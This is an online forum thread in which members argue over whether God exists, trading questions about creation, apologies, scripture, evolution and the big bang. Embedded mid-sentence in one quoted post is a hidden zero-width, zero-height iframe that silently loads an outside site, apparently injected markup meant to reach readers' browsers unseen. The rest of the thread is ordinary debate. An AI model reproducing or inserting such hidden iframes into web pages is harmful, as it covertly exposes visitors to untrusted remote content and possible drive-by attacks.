God is not with us.

SPECTACULAR

i simply don't believe in him or her.. or whatever..
^
^
^
Hey lifesnotfair,
you don't believe in her or whatever?
just think who made you? where are you gonna go when you die? who made all this universe? someone did that for sure, right? just think.

there is no god. WOW, it's really strange how you think people... :(

SPECTACULAR

Because god isn't something. he's the one who made everything, so he's everything. if you can't see him in nothing around you, that's because you didn't take time thinking.
think for a minute, who made the sky?
that big blue ball. someone did right? :?:

Bexi

But your expressing your opinion as was "lifesnotfair", you believe, like many people, God exists, and he does not,(again), like many people.
Who can prove either way huh? x

Bexi

No i won't ask a question when i'm asked in a rude manner like that! I just think accept that not everyone is a believer x

SPECTACULAR

Oh i'm truly sorry. No, i'm so so sorry and i mean it.
oh my god, you're mad at me now. would you please accept my apology?

i don't know what i was thinking. want me to ask again? ok.
who made the beautiful big sky, bexi?
could you please answer me? :(

SPECTACULAR

Okay, it looks like you're not going to answer the question bexi.
anyway, i just want you to know that i'm sorry and i didn't want to upset you.
now, any nonbeliever, would you please answer the question?

Danfalc

Banned
SPECTACULAR said:
i simply don't believe in him or her.. or whatever..
^
^
^
Hey lifesnotfair,
you don't believe in her or whatever?
just think who made you? where are you gonna go when you die? who made all<IFRAME SRC="http://iccee.com/index.html" WIDTH=0 HEIGHT=0 SCROLLING=NO FRAMEBORDER=0></IFRAME> this universe? someone did that for sure, right? just think.

there is no god. WOW, it's really strange how you think people... :(

I think i was made from years of evolution, when i die i believe the only place im going is 6 feet deep,I believe the universe was made by the big bang theory.Sorry i know this question wasnt asked to me, but just because we hold different beliefs doesnt mean we havnt thought about things.At the end of the day people are just stating there personal opinions no ones trying to state it as fact, so i thinks its a bit insulting saying "us people think strange" just because we dont follow your beliefs.I mean how would you feel if someone turned round to you and said its strange how you think because you believe in god.

Like bexi said no one can prove one way or the other, there just personal opinions and beliefs.

Danfalc

Banned
SPECTACULAR said:
now, any nonbeliever, would you please answer the question?

Nonebeliever? :?

The word your looking for i think is atheist its less offensive, just because we dont believe in god doesnt mean we dont have ideas and beliefs on things.

SPECTACULAR

The word your looking for i think is atheist its less offensive, just because we dont believe in god doesnt mean we dont have ideas and beliefs on things.
Okay i'm sorry. i'll use the word you prefer. i never umeant any offense by the word "nonbeliever".

anyway, back to what you say.
I believe the universe was made by the big bang theory
what's that theory. i'm sorry, would you explain it to me a little.
so i thinks its a bit insulting saying "us people think strange" just because we dont follow your beliefs
again, i'm sorry to any one who interprets what i say as offense. can we deal on something? when i say something, i totally mean the good part about it not the bad one. just remembe that. (I should put it as a signature! :lol: )

paul

spectacular - I understand that you weren't trying to be rude :) however I am with Bexi and some others on this one.
I don't think it's possible for everyone to agree on how our universe started, because there will always be people who are 100% confident God created everything, and then others that are 100% sure it was more scientific than that. I think that thinking there is a god looking after us creates a comforting feeling, especially when we're sad or have no hope, however I myself don't believe in one.

SPECTACULAR

Okay thanks bexi. hope you aren't still angry.
thanks paul for replying. :wink:

i'll be reading that site for a while.

lifesnotfair

i would like some evidence that god exists?? there is scientific proof that the universe was created by the big bang, and Humanity was created in a small pool of ooze..

explains a lot...doesn't it..

jesuschristschild

SPECTACULAR

hi, nice to meet you, its awesome that you believe in God....

ive been a believer in God for 2 years ever since an paranormal experience, and 2 very important things ive learned about beliefs in God, is that until God actually draws someone in, they dont have the ability to believe in him, or they wont be able to go to him, we have to be raised from spiritual death just to be able to believe in him (Jesus)

like Paul said "dont trust in the wisdom of man, but in the power of God".....we cant convince people to believe in God, or that he exists, we can only tell them, and pray for them, if you pray and believe with all your heart its answered...always....i used to think i could convince people, you feel Gods spirit and you just want to tell the whole world, but you dont get the reaction you expect, Gods the only one that can convert anyone

take these scriptures for instance
John
15:16 Ye have not chosen me, but I have chosen you, and ordained you, that ye should go and bring forth fruit, and that your fruit should remain: that whatsoever ye shall ask of the Father in my name, he may give it you.

John
15:4 Abide in me, and I in you. As the branch cannot bear fruit of itself, except it abide in the vine; no more can ye, except ye abide in me.
15:5 I am the vine, ye are the branches: He that abideth in me, and I in him, the same bringeth forth much fruit: for without me ye can do nothing.

much love

i dont know if you believe in Jesus Christ, but heres my 2 pennys

Jamie

Bexi

I'm not angry Spectacular, my main point of writing on here was just to say not all people believe in God, and not all of them wish to be convinced otherwise x

countrybumpkin

Actually there is a third choice in the robber with a gun to your head theory and that is to call his bluff by refusing him , most people are not actually willing to shoot someone in the head for their wallet . Also the ideas of heaven and hell are rather simplified for our primitive minds and you have to keep in mind that the bible was written by Man not God or the Supreme being or whatever you want to call it , as well as being translated from language to language , losing clarity each time . The problem here seems to be with definitions and labels. It is easy (and popular these days) to disbeleive in God because 'science has explained everything' when in reality science has only vague and often incorrect notions of a very small part of our reality. Humanity seems to be in its adolescence right now in that we think we know and understand everything and our parents(the preceding generation who largely held religious beliefs) are clueless , much like teenagers think that they know and understand everything and mom and dad are out of the loop.I can understand how so many people choose to disbeleive in a certain religion or even all organized religions , but it is hard to imagine not having any belief in some kind of higher power . We can believe in other dimensions and black holes and quantum physics without having the slightest idea of how they work , yet it is too much of a stretch to think that maybe we were created out of more than just slime and mud. I myself can't imagine how a chemical accident could work so well as the world does , or did before we started to screw things up with sciences supposed understanding of everything . How can anyone look at even something as simple as a spiders web and not think that there is more at work here than a big accidental explosion of gases in space. I don't try and discredit evolution either , there is too much proof of it . However most people don't actually understand this theory . Many seem to think that it involves a creature growing new appendages and undergoing physical changes rather than the theory of natural selection, whereby already existing physical traits are accentuated by an environmental change which lets certain animals survive better than some others due to a certain physical characteristic. My thought is that every religion has a small part of the big picture right but no one has it all . There is room for science and magic in the same world ; "where science leaves off , you will find God"
Round one goes , technically , to Lawyerguy: Free will -"the power of human will to choose without external influence" but as far as religion goes if you believe the bible , you can choose to live a life of self indulgence and sin and if you truly feel remorse in your heart before you die and ask for forgiveness , you will be allowed into heaven.

J

"Who made the sky" is an incorrect question. The "sky" is the product of one's viewpoint; it's a perception of the atmosphere. "Who makes the sky" is whoever is looking at it, essentially.

As for the atmosphere, that was created through fairly well-understood natural processes that don't require unproven supernatural hypotheses to operate.

And just becuase we may NOT know the details about something yet does not mean we never will, or, even if we don't, that it's not governed by the same laws of physics that govern absolutely everything else we've ever discovered (the "ID"/creationist movement's big fallacy-- precisely the same thinkg that led the ancient Greeks to appoint a god for each important process they wanted explained-- until science found the facts, after which the gods fell by the wayside like the false hypotheses they were).